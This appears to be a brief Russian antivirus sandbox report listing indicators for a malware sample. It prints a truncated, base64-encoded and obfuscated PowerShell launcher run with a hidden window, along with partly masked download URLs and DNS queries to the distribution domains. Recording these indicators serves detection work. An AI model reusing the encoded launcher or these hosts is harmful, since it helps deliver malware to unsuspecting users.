Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGwANgA0AHQAMABqAD0AKAAoACcAVgBlAHAAJwArACcAXwAnACkAKwAoACcAMABiACcAKwAnAHAAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AFUAcwBFAHIAcABSAG8AZgBpAGwAZQBcAH...
- http://ho###fuvo.com/files/QSNUeuP/
- http://gf##cems.it/modules/B/
- http://pl#####saudetotal.com/erros/wUI/
- http://ve####desaude.com/erros/zyHmix/
- DNS ASK ho###fuvo.com
- DNS ASK gf##cems.it
- DNS ASK pl#####saudetotal.com
- DNS ASK rv##.com
- DNS ASK ve####desaude.com
- DNS ASK sc###c-heap.de
- DNS ASK el####o-grell.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGwANgA0AHQAMABqAD0AKAAoACcAVgBlAHAAJwArACcAXwAnACkAKwAoACcAMABiACcAKwAnAHAAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AFUAcwBFAHIAcABSAG8AZgBpAGwAZQBcAH...' (со скрытым окном)